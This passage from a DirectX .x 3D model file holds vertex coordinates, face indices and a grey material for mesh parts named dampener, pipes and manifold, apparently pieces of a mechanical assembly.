0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _pipes1 Frame _dampener { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh dampener { 342; -0.488290;-0.522366;-1.717457;, -0.488289;-0.520268;-1.704270;, -0.488289;-0.528660;-1.704270;, -0.488286;-0.530757;-1.643610;, -0.488286;-0.555932;-1.643610;, -0.488287;-0.555932;-1.672622;, -0.488290;-0.593694;-1.722732;, -0.488292;-0.627262;-1.725368;, -0.488288;-0.627262;-1.685809;, -0.488287;-0.591597;-1.672622;, -0.488287;-0.591597;-1.656798;, -0.488286;-0.625163;-1.648887;, -0.488286;-0.625163;-1.638336;, -0.488285;-0.593694;-1.625149;, -0.488285;-0.593694;-1.614602;, -0.488283;-0.625163;-1.609325;, -0.488282;-0.625163;-1.593502;, -0.488282;-0.677612;-1.593502;, -0.488272;-0.677612;-1.472184;, -0.474929;-0.519962;-1.717459;, -0.475634;-0.517991;-1.704272;, -0.472820;-0.525876;-1.704272;, -0.472111;-0.527847;-1.643613;, -0.463674;-0.551504;-1.643614;, -0.463675;-0.551504;-1.672625;, -0.451021;-0.586990;-1.722736;, -0.439774;-0.618533;-1.725372;, -0.439768;-0.618533;-1.685812;, -0.451721;-0.585018;-1.672626;, -0.451720;-0.585018;-1.656800;, -0.440468;-0.616560;-1.648889;, -0.440467;-0.616560;-1.638340;, -0.451015;-0.586990;-1.625153;, -0.451014;-0.586990;-1.614604;, -0.440466;-0.616560;-1.609330;, -0.440466;-0.616560;-1.593506;, -0.422885;-0.665845;-1.593507;, -0.422876;-0.665845;-1.472189;, -0.463182;-0.513040;-1.717459;, -0.464501;-0.511434;-1.704272;, -0.459217;-0.517862;-1.704272;, -0.457890;-0.519469;-1.643614;, -0.442031;-0.538755;-1.643614;, -0.442033;-0.538755;-1.672626;, -0.418248;-0.567682;-1.722737;, -0.397105;-0.593396;-1.725377;, -0.397101;-0.593396;-1.685816;, -0.419566;-0.566074;-1.672629;, -0.419564;-0.566074;-1.656803;, -0.398420;-0.591788;-1.648892;, -0.398419;-0.591788;-1.638344;, -0.418242;-0.567682;-1.625156;, -0.418241;-0.567682;-1.614606;, -0.398417;-0.591788;-1.609333;, -0.398417;-0.591788;-1.593509;, -0.365378;-0.631966;-1.593511;, -0.365367;-0.631966;-1.472195;, -0.454462;-0.502435;-1.717460;, -0.456240;-0.501387;-1.704272;, -0.449119;-0.505582;-1.704275;, -0.447333;-0.506631;-1.643614;, -0.425967;-0.519219;-1.643616;, -0.425970;-0.519219;-1.672627;, -0.393923;-0.538100;-1.722739;, -0.365437;-0.554884;-1.725379;, -0.365432;-0.554884;-1.685819;, -0.395700;-0.537050;-1.672630;, -0.395699;-0.537050;-1.656805;, -0.367210;-0.553835;-1.648895;, -0.367210;-0.553835;-1.638346;, -0.393917;-0.538100;-1.625157;, -0.393915;-0.538100;-1.614608;, -0.367207;-0.553835;-1.609335;, -0.367207;-0.553835;-1.593511;, -0.322692;-0.580059;-1.593515;, -0.322682;-0.580059;-1.472198;, -0.449821;-0.489428;-1.717460;, -0.451847;-0.489063;-1.704275;, -0.443747;-0.490521;-1.704275;, -0.441715;-0.490884;-1.643614;, -0.417420;-0.495256;-1.643616;, -0.417421;-0.495256;-1.672629;, -0.380980;-0.501814;-1.722739;, -0.348586;-0.507642;-1.725380;, -0.348581;-0.507642;-1.685821;, -0.383000;-0.501449;-1.672631;, -0.383000;-0.501449;-1.656807;, -0.350605;-0.507278;-1.648897;, -0.350605;-0.507278;-1.638348;, -0.380973;-0.501814;-1.625158;, -0.380972;-0.501814;-1.614610;, -0.350601;-0.507278;-1.609337;, -0.350598;-0.507278;-1.593512;, -0.299983;-0.516385;-1.593516;, -0.299973;-0.516385;-1.472199;, -0.449821;-0.475584;-1.717460;, -0.451847;-0.475948;-1.704275;, -0.443747;-0.474491;-1.704275;, -0.441715;-0.474126;-1.643614;, -0.417420;-0.469755;-1.643616;, -0.417421;-0.469755;-1.672629;, -0.380980;-0.463198;-1.722739;, -0.348586;-0.457369;-1.725380;, -0.348581;-0.457369;-1.685821;, -0.383000;-0.463562;-1.672631;, -0.383000;-0.463562;-1.656807;, -0.350605;-0.457732;-1.648897;, -0.350605;-0.457732;-1.638348;, -0.380973;-0.463198;-1.625158;, -0.380972;-0.463198;-1.614610;, -0.350601;-0.457732;-1.609337;, -0.350598;-0.457732;-1.593512;, -0.299983;-0.448625;-1.593516;, -0.299973;-0.448625;-1.472199;, -0.454462;-0.462575;-1.717460;, -0.456240;-0.463624;-1.704272;, -0.449119;-0.459428;-1.704275;, -0.447333;-0.458379;-1.643614;, -0.425967;-0.445792;-1.643616;, -0.425970;-0.445792;-1.672627;, -0.393923;-0.426910;-1.722739;, -0.365437;-0.410128;-1.725379;, -0.365432;-0.410128;-1.685819;, -0.395700;-0.427959;-1.672630;, -0.395699;-0.427959;-1.656805;, -0.367210;-0.411175;-1.648895;, -0.367210;-0.411175;-1.638346;, -0.393917;-0.426910;-1.625157;, -0.393915;-0.426910;-1.614608;, -0.367207;-0.411175;-1.609335;, -0.367207;-0.411175;-1.593511;, -0.322692;-0.384953;-1.593515;, -0.322682;-0.384953;-1.472198;, -0.463182;-0.451971;-1.717459;, -0.464501;-0.453578;-1.704272;, -0.459217;-0.447149;-1.704272;, -0.457890;-0.445543;-1.643614;, -0.442031;-0.426257;-1.643614;, -0.442033;-0.426257;-1.672626;, -0.418248;-0.397330;-1.722737;, -0.397105;-0.371616;-1.725377;, -0.397101;-0.371616;-1.685816;, -0.419566;-0.398936;-1.672629;, -0.419564;-0.398936;-1.656803;, -0.398420;-0.373222;-1.648892;, -0.398419;-0.373222;-1.638344;, -0.418242;-0.397330;-1.625156;, -0.418241;-0.397330;-1.614606;, -0.398417;-0.373222;-1.609333;, -0.398417;-0.373222;-1.593509;, -0.365378;-0.333045;-1.593511;, -0.365367;-0.333045;-1.472195;, -0.474929;-0.445049;-1.717459;, -0.475634;-0.447020;-1.704272;, -0.472820;-0.439134;-1.704272;, -0.472111;-0.437163;-1.643613;, -0.463674;-0.413506;-1.643614;, -0.463675;-0.413506;-1.672625;, -0.451021;-0.378020;-1.722736;, -0.439774;-0.346479;-1.725372;, -0.439768;-0.346479;-1.685812;, -0.451721;-0.379993;-1.672626;, -0.451720;-0.379993;-1.656800;, -0.440468;-0.348450;-1.648889;, -0.440467;-0.348450;-1.638340;, -0.451015;-0.378021;-1.625153;, -0.451014;-0.378021;-1.614604;, -0.440466;-0.348450;-1.609330;, -0.440466;-0.348450;-1.593506;, -0.422885;-0.299166;-1.593507;, -0.422876;-0.299166;-1.472189;, -0.488290;-0.442644;-1.717457;, -0.488289;-0.444743;-1.704270;, -0.488289;-0.436350;-1.704270;, -0.488286;-0.434253;-1.643610;, -0.488286;-0.409078;-1.643610;, -0.488287;-0.409078;-1.672622;, -0.488290;-0.371316;-1.722732;, -0.488292;-0.337749;-1.725368;, -0.488288;-0.337749;-1.685809;, -0.488287;-0.373414;-1.672622;, -0.488287;-0.373414;-1.656798;, -0.488286;-0.339847;-1.648887;, -0.488286;-0.339847;-1.638336;, -0.488285;-0.371316;-1.625149;, -0.488285;-0.371316;-1.614602;, -0.488283;-0.339847;-1.609325;, -0.488282;-0.339847;-1.593502;, -0.488282;-0.287400;-1.593502;, -0.488272;-0.287400;-1.472184;, -0.501651;-0.445049;-1.717457;, -0.500947;-0.447020;-1.704270;, -0.503760;-0.439134;-1.704268;, -0.504459;-0.437163;-1.643610;, -0.512897;-0.413506;-1.643610;, -0.512898;-0.413506;-1.672620;, -0.525559;-0.378020;-1.722729;, -0.536812;-0.346479;-1.725365;, -0.536808;-0.346479;-1.685806;, -0.524853;-0.379993;-1.672620;, -0.524852;-0.379993;-1.656795;, -0.536101;-0.348450;-1.648883;, -0.536101;-0.348450;-1.638333;, -0.525553;-0.378021;-1.625147;, -0.525551;-0.378021;-1.614598;, -0.536100;-0.348450;-1.609321;, -0.536098;-0.348450;-1.593498;, -0.553679;-0.299166;-1.593495;, -0.553669;-0.299166;-1.472179;, -0.513402;-0.451971;-1.717455;, -0.512077;-0.453578;-1.704268;, -0.517365;-0.447149;-1.704268;, -0.518681;-0.445543;-1.643609;, -0.534540;-0.426257;-1.643608;, -0.534543;-0.426257;-1.672618;, -0.558333;-0.397330;-1.722725;, -0.579478;-0.371616;-1.725361;, -0.579475;-0.371616;-1.685801;, -0.557007;-0.398936;-1.672617;, -0.557006;-0.398936;-1.656793;, -0.578151;-0.373222;-1.648879;, -0.578151;-0.373222;-1.638329;, -0.558326;-0.397330;-1.625145;, -0.558325;-0.397330;-1.614595;, -0.578148;-0.373222;-1.609318;, -0.578146;-0.373222;-1.593494;, -0.611186;-0.333045;-1.593492;, -0.611176;-0.333045;-1.472175;, -0.522122;-0.462575;-1.717455;, -0.520339;-0.463624;-1.704268;, -0.527462;-0.459428;-1.704267;, -0.529237;-0.458379;-1.643609;, -0.550603;-0.445792;-1.643606;, -0.550605;-0.445792;-1.672617;, -0.582657;-0.426910;-1.722723;, -0.611147;-0.410128;-1.725359;, -0.611145;-0.410128;-1.685799;, -0.580873;-0.427959;-1.672615;, -0.580873;-0.427959;-1.656791;, -0.609361;-0.411175;-1.648876;, -0.609360;-0.411175;-1.638328;, -0.582652;-0.426910;-1.625143;, -0.582650;-0.426910;-1.614594;, -0.609357;-0.411175;-1.609316;, -0.609356;-0.411175;-1.593492;, -0.653868;-0.384953;-1.593489;, -0.653861;-0.384953;-1.472171;, -0.526762;-0.475584;-1.717453;, -0.524735;-0.475948;-1.704268;, -0.532834;-0.474491;-1.704267;, -0.534854;-0.474126;-1.643608;, -0.559151;-0.469755;-1.643606;, -0.559154;-0.469755;-1.672617;, -0.595601;-0.463198;-1.722723;, -0.627999;-0.457369;-1.725357;, -0.627995;-0.457369;-1.685797;, -0.593574;-0.463562;-1.672615;, -0.593571;-0.463562;-1.656789;, -0.625967;-0.457732;-1.648875;, -0.625967;-0.457732;-1.638325;, -0.595594;-0.463198;-1.625142;, -0.595594;-0.463198;-1.614592;, -0.625964;-0.457732;-1.609316;, -0.625962;-0.457732;-1.593490;, -0.676581;-0.448625;-1.593486;, -0.676571;-0.448625;-1.472169;, -0.526762;-0.489428;-1.717453;, -0.524735;-0.489063;-1.704268;, -0.532834;-0.490521;-1.704267;, -0.534854;-0.490884;-1.643608;, -0.559151;-0.495256;-1.643606;, -0.559154;-0.495256;-1.672617;, -0.595601;-0.501814;-1.722723;, -0.627999;-0.507642;-1.725357;, -0.627995;-0.507642;-1.685797;, -0.593574;-0.501449;-1.672615;, -0.593571;-0.501449;-1.656789;, -0.625967;-0.507278;-1.648875;, -0.625967;-0.507278;-1.638325;, -0.595594;-0.501814;-1.625142;, -0.595594;-0.501814;-1.614592;, -0.625964;-0.507278;-1.609316;, -0.625962;-0.507278;-1.593490;, -0.676581;-0.516385;-1.593486;, -0.676571;-0.516385;-1.472169;, -0.522122;-0.502435;-1.717455;, -0.520339;-0.501387;-1.704268;, -0.527462;-0.505582;-1.704267;, -0.529237;-0.506631;-1.643609;, -0.550603;-0.519219;-1.643606;, -0.550605;-0.519219;-1.672617;, -0.582657;-0.538100;-1.722723;, -0.611147;-0.554884;-1.725359;, -0.611145;-0.554884;-1.685799;, -0.580873;-0.537050;-1.672615;, -0.580873;-0.537050;-1.656791;, -0.609361;-0.553835;-1.648876;, -0.609360;-0.553835;-1.638328;, -0.582652;-0.538100;-1.625143;, -0.582650;-0.538100;-1.614594;, -0.609357;-0.553835;-1.609316;, -0.609356;-0.553835;-1.593492;, -0.653868;-0.580059;-1.593489;, -0.653861;-0.580059;-1.472171;, -0.513402;-0.513040;-1.717455;, -0.512077;-0.511434;-1.704268;, -0.517365;-0.517862;-1.704268;, -0.518681;-0.519469;-1.643609;, -0.534540;-0.538755;-1.643608;, -0.534543;-0.538755;-1.672618;, -0.558333;-0.567682;-1.722725;, -0.579478;-0.593396;-1.725361;, -0.579475;-0.593396;-1.685801;, -0.557007;-0.566074;-1.672617;, -0.557006;-0.566074;-1.656793;, -0.578151;-0.591788;-1.648879;, -0.578151;-0.591788;-1.638329;, -0.558326;-0.567682;-1.625145;, -0.558325;-0.567682;-1.614595;, -0.578148;-0.591788;-1.609318;, -0.578146;-0.591788;-1.593494;, -0.611186;-0.631966;-1.593492;, -0.611176;-0.631966;-1.472175;, -0.501651;-0.519962;-1.717457;, -0.500947;-0.517991;-1.704270;, -0.503760;-0.525876;-1.704268;, -0.504459;-0.527847;-1.643610;, -0.512897;-0.551504;-1.643610;, -0.512898;-0.551504;-1.672620;, -0.525559;-0.586990;-1.722729;, -0.536812;-0.618533;-1.725365;, -0.536808;-0.618533;-1.685806;, -0.524853;-0.585018;-1.672620;, -0.524852;-0.585018;-1.656795;, -0.536101;-0.616560;-1.648883;, -0.536101;-0.616560;-1.638333;, -0.525553;-0.586990;-1.625147;, -0.525551;-0.586990;-1.614598;, -0.536100;-0.616560;-1.609321;, -0.536098;-0.616560;-1.593498;, -0.553679;-0.665845;-1.593495;, -0.553669;-0.665845;-1.472179;; 326; 18;341,18,37,56,75,94,113,132,151,170,189,208,227,246,265,284,303,322;, 18;19,0,323,304,285,266,247,228,209,190,171,152,133,114,95,76,57,38;, 4;189,170,169,188;, 4;208,189,188,207;, 4;227,208,207,226;, 4;246,227,226,245;, 4;265,246,245,264;, 4;284,265,264,283;, 4;303,284,283,302;, 4;322,303,302,321;, 4;341,322,321,340;, 4;18,341,340,17;, 4;37,18,17,36;, 4;56,37,36,55;, 4;75,56,55,74;, 4;94,75,74,93;, 4;113,94,93,112;, 4;132,113,112,131;, 4;151,132,131,150;, 4;170,151,150,169;, 4;188,169,168,187;, 4;207,188,187,206;, 4;226,207,206,225;, 4;245,226,225,244;, 4;264,245,244,263;, 4;283,264,263,282;, 4;302,283,282,301;, 4;321,302,301,320;, 4;340,321,320,339;, 4;17,340,339,16;, 4;36,17,16,35;, 4;55,36,35,54;, 4;74,55,54,73;, 4;93,74,73,92;, 4;112,93,92,111;, 4;131,112,111,130;, 4;150,131,130,149;, 4;169,150,149,168;, 4;187,168,167,186;, 4;206,187,186,205;, 4;225,206,205,224;, 4;244,225,224,243;, 4;263,244,243,262;, 4;282,263,262,281;, 4;301,282,281,300;, 4;320,301,300,319;, 4;339,320,319,338;, 4;16,339,338,15;, 4;35,16,15,34;, 4;54,35,34,53;, 4;73,54,53,72;, 4;92,73,72,91;, 4;111,92,91,110;, 4;130,111,110,129;, 4;149,130,129,148;, 4;168,149,148,167;, 4;186,167,166,185;, 4;205,186,185,204;, 4;224,205,204,223;, 4;243,224,223,242;, 4;262,243,242,261;, 4;281,262,261,280;, 4;300,281,280,299;, 4;319,300,299,318;, 4;338,319,318,337;, 4;15,338,337,14;, 4;34,15,14,33;, 4;53,34,33,52;, 4;72,53,52,71;, 4;91,72,71,90;, 4;110,91,90,109;, 4;129,110,109,128;, 4;148,129,128,147;, 4;167,148,147,166;, 4;185,166,165,184;, 4;204,185,184,203;, 4;223,204,203,222;, 4;242,223,222,241;, 4;261,242,241,260;, 4;280,261,260,279;, 4;299,280,279,298;, 4;318,299,298,317;, 4;337,318,317,336;, 4;14,337,336,13;, 4;33,14,13,32;, 4;52,33,32,51;, 4;71,52,51,70;, 4;90,71,70,89;, 4;109,90,89,108;, 4;128,109,108,127;, 4;147,128,127,146;, 4;166,147,146,165;, 4;184,165,164,183;, 4;203,184,183,202;, 4;222,203,202,221;, 4;241,222,221,240;, 4;260,241,240,259;, 4;279,260,259,278;, 4;298,279,278,297;, 4;317,298,297,316;, 4;336,317,316,335;, 4;13,336,335,12;, 4;32,13,12,31;, 4;51,32,31,50;, 4;70,51,50,69;, 4;89,70,69,88;, 4;108,89,88,107;, 4;127,108,107,126;, 4;146,127,126,145;, 4;165,146,145,164;, 4;183,164,163,182;, 4;202,183,182,201;, 4;221,202,201,220;, 4;240,221,220,239;, 4;259,240,239,258;, 4;278,259,258,277;, 4;297,278,277,296;, 4;316,297,296,315;, 4;335,316,315,334;, 4;12,335,334,11;, 4;31,12,11,30;, 4;50,31,30,49;, 4;69,50,49,68;, 4;88,69,68,87;, 4;107,88,87,106;, 4;126,107,106,125;, 4;145,126,125,144;, 4;164,145,144,163;, 4;182,163,162,181;, 4;201,182,181,200;, 4;220,201,200,219;, 4;239,220,219,238;, 4;258,239,238,257;, 4;277,258,257,276;, 4;296,277,276,295;, 4;315,296,295,314;, 4;334,315,314,333;, 4;11,334,333,10;, 4;30,11,10,29;, 4;49,30,29,48;, 4;68,49,48,67;, 4;87,68,67,86;, 4;106,87,86,105;, 4;125,106,105,124;, 4;144,125,124,143;, 4;163,144,143,162;, 4;181,162,161,180;, 4;200,181,180,199;, 4;219,200,199,218;, 4;238,219,218,237;, 4;257,238,237,256;, 4;276,257,256,275;, 4;295,276,275,294;, 4;314,295,294,313;, 4;333,314,313,332;, 4;10,333,332,9;, 4;29,10,9,28;, 4;48,29,28,47;, 4;67,48,47,66;, 4;86,67,66,85;, 4;105,86,85,104;, 4;124,105,104,123;, 4;143,124,123,142;, 4;162,143,142,161;, 4;180,161,160,179;, 4;199,180,179,198;, 4;218,199,198,217;, 4;237,218,217,236;, 4;256,237,236,255;, 4;275,256,255,274;, 4;294,275,274,293;, 4;313,294,293,312;, 4;332,313,312,331;, 4;9,332,331,8;, 4;28,9,8,27;, 4;47,28,27,46;, 4;66,47,46,65;, 4;85,66,65,84;, 4;104,85,84,103;, 4;123,104,103,122;, 4;142,123,122,141;, 4;161,142,141,160;, 4;179,160,159,178;, 4;198,179,178,197;, 4;217,198,197,216;, 4;236,217,216,235;, 4;255,236,235,254;, 4;274,255,254,273;, 4;293,274,273,292;, 4;312,293,292,311;, 4;331,312,311,330;, 4;8,331,330,7;, 4;27,8,7,26;, 4;46,27,26,45;, 4;65,46,45,64;, 4;84,65,64,83;, 4;103,84,83,102;, 4;122,103,102,121;, 4;141,122,121,140;, 4;160,141,140,159;, 4;178,159,158,177;, 4;197,178,177,196;, 4;216,197,196,215;, 4;235,216,215,234;, 4;254,235,234,253;, 4;273,254,253,272;, 4;292,273,272,291;, 4;311,292,291,310;, 4;330,311,310,329;, 4;7,330,329,6;, 4;26,7,6,25;, 4;45,26,25,44;, 4;64,45,44,63;, 4;83,64,63,82;, 4;102,83,82,101;, 4;121,102,101,120;, 4;140,121,120,139;, 4;159,140,139,158;, 4;177,158,157,176;, 4;196,177,176,195;, 4;215,196,195,214;, 4;234,215,214,233;, 4;233,214,213,232;, 4;214,195,194,213;, 4;195,176,175,194;, 4;176,157,156,175;, 4;157,138,137,156;, 4;138,119,118,137;, 4;119,100,99,118;, 4;120,101,100,119;, 4;139,120,119,138;, 4;158,139,138,157;, 4;101,82,81,100;, 4;100,81,80,99;, 4;81,62,61,80;, 4;82,63,62,81;, 4;63,44,43,62;, 4;62,43,42,61;, 4;43,24,23,42;, 4;44,25,24,43;, 4;25,6,5,24;, 4;24,5,4,23;, 4;5,328,327,4;, 4;6,329,328,5;, 4;329,310,309,328;, 4;328,309,308,327;, 4;309,290,289,308;, 4;310,291,290,309;, 4;291,272,271,290;, 4;290,271,270,289;, 4;271,252,251,270;, 4;272,253,252,271;, 4;253,234,233,252;, 4;252,233,232,251;, 4;175,156,155,174;, 4;194,175,174,193;, 4;213,194,193,212;, 4;232,213,212,231;, 4;251,232,231,250;, 4;270,251,250,269;, 4;289,270,269,288;, 4;308,289,288,307;, 4;327,308,307,326;, 4;4,327,326,3;, 4;23,4,3,22;, 4;42,23,22,41;, 4;61,42,41,60;, 4;80,61,60,79;, 4;99,80,79,98;, 4;118,99,98,117;, 4;137,118,117,136;, 4;156,137,136,155;, 4;174,155,154,173;, 4;193,174,173,192;, 4;212,193,192,211;, 4;231,212,211,230;, 4;250,231,230,249;, 4;269,250,249,268;, 4;288,269,268,287;, 4;307,288,287,306;, 4;326,307,306,325;, 4;3,326,325,2;, 4;22,3,2,21;, 4;41,22,21,40;, 4;60,41,40,59;, 4;79,60,59,78;, 4;98,79,78,97;, 4;117,98,97,116;, 4;136,117,116,135;, 4;155,136,135,154;, 4;173,154,153,172;, 4;192,173,172,191;, 4;211,192,191,210;, 4;230,211,210,229;, 4;249,230,229,248;, 4;268,249,248,267;, 4;287,268,267,286;, 4;306,287,286,305;, 4;325,306,305,324;, 4;2,325,324,1;, 4;21,2,1,20;, 4;40,21,20,39;, 4;59,40,39,58;, 4;78,59,58,77;, 4;97,78,77,96;, 4;116,97,96,115;, 4;135,116,115,134;, 4;154,135,134,153;, 4;172,153,152,171;, 4;191,172,171,190;, 4;210,191,190,209;, 4;229,210,209,228;, 4;248,229,228,247;, 4;267,248,247,266;, 4;286,267,266,285;, 4;305,286,285,304;, 4;324,305,304,323;, 4;1,324,323,0;, 4;20,1,0,19;, 4;39,20,19,38;, 4;58,39,38,57;, 4;77,58,57,76;, 4;96,77,76,95;, 4;115,96,95,114;, 4;134,115,114,133;, 4;153,134,133,152;; MeshMaterialList { 1; 326; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.498039;0.498039;0.498039;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _dampener Frame _manifold { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh manifold { 894; -0.026042;0.359235;0.378253;, 0.012183;0.404705;0.378252;, 0.006936;0.398512;-1.131825;, -0.020875;0.365429;-1.131825;, -0.036282;0.347067;-0.084175;, -0.035857;0.347588;-0.591549;, -0.035585;0.347921;-0.921180;, 0.021658;0.416020;-0.921181;, 0.021946;0.416351;-0.591550;, 0.022398;0.416873;-0.084176;, 0.068201;0.471348;0.304044;, 0.047924;0.447229;0.183681;, -0.061792;0.316710;0.183684;, -0.082064;0.292591;0.304047;, -0.062960;0.315335;-0.265732;, -0.079765;0.295340;-0.144037;, 0.065878;0.468600;-0.144040;, 0.049067;0.448605;-0.265735;, 0.065962;0.468715;-0.652006;, 0.049028;0.448574;-0.773681;, 0.065781;0.468509;-0.968631;, 0.053166;0.453506;-1.091215;, -0.067102;0.310433;-1.091213;, -0.073154;0.303229;-0.968627;, -0.062947;0.315365;-0.773678;, -0.079875;0.295226;-0.652004;, -0.006929;0.381970;0.381628;, 0.039063;0.436684;0.360411;, 0.068820;0.472088;0.232203;, 0.021730;0.416071;0.159630;, -0.035602;0.347869;0.159632;, -0.082687;0.291851;0.232207;, -0.052923;0.327257;0.360414;, 0.036099;0.433172;-0.091412;, 0.068809;0.472088;-0.215832;, 0.022713;0.417253;-0.291325;, -0.036606;0.346685;-0.291324;, -0.082700;0.291851;-0.215828;, -0.049984;0.330768;-0.091410;, 0.036155;0.433252;-0.599199;, 0.068796;0.472088;-0.723908;, 0.022693;0.417245;-0.799212;, -0.036613;0.346695;-0.799211;, -0.082714;0.291851;-0.723904;, -0.050066;0.330687;-0.599197;, 0.029625;0.425497;-0.926642;, 0.068787;0.472088;-1.051861;, 0.026125;0.421339;-1.122750;, -0.040063;0.342600;-1.122748;, -0.082721;0.291851;-1.036057;, -0.043552;0.338443;-0.926640;, -0.068063;0.341524;0.360414;, -0.041182;0.373503;0.378254;, -0.022071;0.396238;0.381628;, -0.002960;0.418973;0.378253;, 0.023922;0.450951;0.360412;, 0.053061;0.485616;0.304044;, 0.053679;0.486357;0.232203;, 0.032782;0.461497;0.183681;, 0.006588;0.430337;0.159631;, 0.007256;0.431141;-0.084176;, 0.020957;0.447438;-0.091412;, 0.050737;0.482868;-0.144040;, 0.053668;0.486357;-0.215832;, 0.033926;0.462873;-0.265734;, 0.007573;0.431521;-0.291325;, 0.006805;0.430619;-0.591550;, 0.021013;0.447520;-0.599199;, 0.050821;0.482982;-0.652006;, 0.053655;0.486357;-0.723908;, 0.033887;0.462841;-0.773680;, 0.007553;0.431513;-0.799212;, 0.006516;0.430287;-0.921181;, 0.014483;0.439765;-0.926641;, 0.050640;0.482777;-0.968631;, 0.053646;0.486357;-1.051861;, 0.038025;0.467774;-1.091215;, 0.010983;0.435607;-1.122749;, -0.008205;0.412779;-1.131825;, -0.036015;0.379696;-1.131824;, -0.055204;0.356867;-1.122747;, -0.082242;0.324701;-1.091212;, -0.097862;0.306118;-1.036057;, -0.088295;0.317498;-0.968627;, -0.058694;0.352710;-0.926639;, -0.050727;0.362188;-0.921179;, -0.051754;0.360963;-0.799211;, -0.078088;0.329633;-0.773677;, -0.097855;0.306118;-0.723904;, -0.095016;0.309493;-0.652003;, -0.065206;0.344954;-0.599197;, -0.050998;0.361857;-0.591548;, -0.051748;0.360954;-0.291323;, -0.078101;0.329603;-0.265731;, -0.097840;0.306118;-0.215828;, -0.094906;0.309607;-0.144036;, -0.065124;0.345035;-0.091409;, -0.051421;0.361335;-0.084175;, -0.050741;0.362137;0.159632;, -0.076933;0.330978;0.183684;, -0.097828;0.306118;0.232207;, -0.097204;0.306858;0.304048;, -0.068924;0.362351;-0.926639;, -0.060957;0.371829;-0.921179;, -0.003712;0.439927;-0.921180;, 0.004255;0.449404;-0.926641;, 0.040410;0.492417;-0.968630;, 0.043417;0.495997;-1.051861;, 0.027796;0.477414;-1.091214;, 0.000755;0.445248;-1.122749;, -0.018435;0.422419;-1.131825;, -0.046247;0.389337;-1.131824;, -0.065434;0.366508;-1.122747;, -0.092474;0.334342;-1.091212;, -0.108091;0.315760;-1.036056;, -0.098526;0.327138;-0.968627;, -0.075437;0.354595;-0.599196;, -0.061227;0.371496;-0.591548;, -0.003424;0.440260;-0.591550;, 0.010784;0.457160;-0.599199;, 0.040590;0.492623;-0.652006;, 0.043426;0.495997;-0.723907;, 0.023657;0.472481;-0.773680;, -0.002679;0.441153;-0.799212;, -0.061985;0.370602;-0.799210;, -0.088319;0.339274;-0.773677;, -0.108083;0.315760;-0.723904;, -0.105248;0.319133;-0.652003;, -0.075355;0.354677;-0.091409;, -0.061652;0.370976;-0.084174;, -0.002974;0.440780;-0.084176;, 0.010727;0.457079;-0.091411;, 0.040508;0.492508;-0.144040;, 0.043438;0.495997;-0.215832;, 0.023696;0.472512;-0.265734;, -0.002658;0.441161;-0.291325;, -0.061977;0.370594;-0.291323;, -0.088331;0.339244;-0.265731;, -0.108071;0.315760;-0.215828;, -0.105137;0.319247;-0.144036;, -0.078294;0.351164;0.360415;, -0.051413;0.383143;0.378254;, -0.032301;0.405879;0.381628;, -0.013188;0.428612;0.378253;, 0.013691;0.460592;0.360412;, 0.042830;0.495257;0.304044;, 0.043451;0.495997;0.232203;, 0.022552;0.471137;0.183681;, -0.003640;0.439978;0.159631;, -0.060971;0.371778;0.159632;, -0.087164;0.340618;0.183684;, -0.108058;0.315760;0.232207;, -0.107435;0.316499;0.304048;, -0.094757;0.352564;-1.083088;, -0.108437;0.336286;-1.034776;, -0.099987;0.346338;-0.975211;, -0.073463;0.377890;-0.937590;, 